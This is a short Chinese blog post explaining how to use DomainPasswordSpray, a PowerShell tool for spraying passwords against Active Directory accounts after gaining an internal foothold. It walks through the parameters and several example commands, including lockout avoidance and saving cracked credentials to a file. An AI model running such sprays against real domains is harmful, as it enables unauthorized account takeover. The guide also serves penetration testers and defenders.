前言
在拿到一台内网服务器之后,想要进行进一步的域渗透时,如果在内网中有着庞大的用户列表,你会怎么办?
powershell脚本
DomainPasswordSpray是一个powershell脚本,主要原理是先来抓取域用户账号,然后指定密码字典进行域认证。认证通过的就是密码正确的了。
简单使用
Invoke-DomainPasswordSpray -Password chabug
这个命令会从当前的域中生成用户列表,然后将每个用户名和chabug
的密码组合进行枚举认证。
参数详解
-
Domain
指定要测试的域名 -
RemoveDisabled
尝试从用户列表删除禁用的账户 -
RemovePotentialLockouts
删除锁定账户 -
UserList
自定义用户列表(字典)。 如果未指定,这将自动从域中获取 -
Password
指定单个密码进行口令测试 -
PasswordList
指定一个密码字典 -
OutFile
将结果保存到某个文件 -
Force
当枚举出第一个后继续枚举,不询问
使用例子
C:\PS> Get-DomainUserList
该命令将从域中收集用户列表。
C:\PS> Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
该命令将收集域“域名”中的用户列表,包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写“入“userlist.txt”文件中
C:\PS> Invoke-DomainPasswordSpray -Password Winter2016
该命令将会从域环境中获取用户名,然后逐个以密码Winter2016
进行认证枚举
C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt
该命令将会从users.txt
中提取用户名,与passlist.txt
中的密码对照成一对口令,进行域认证枚举,登录成功的结果将会输出到sprayed-creds.txt
希望对你的渗透之路有帮助。
本文引用或涉及的文章链接:
http://payloads.online/archivers/2018-05-02/1
http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt
https://github.com/dafthack/DomainPasswordSpray
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er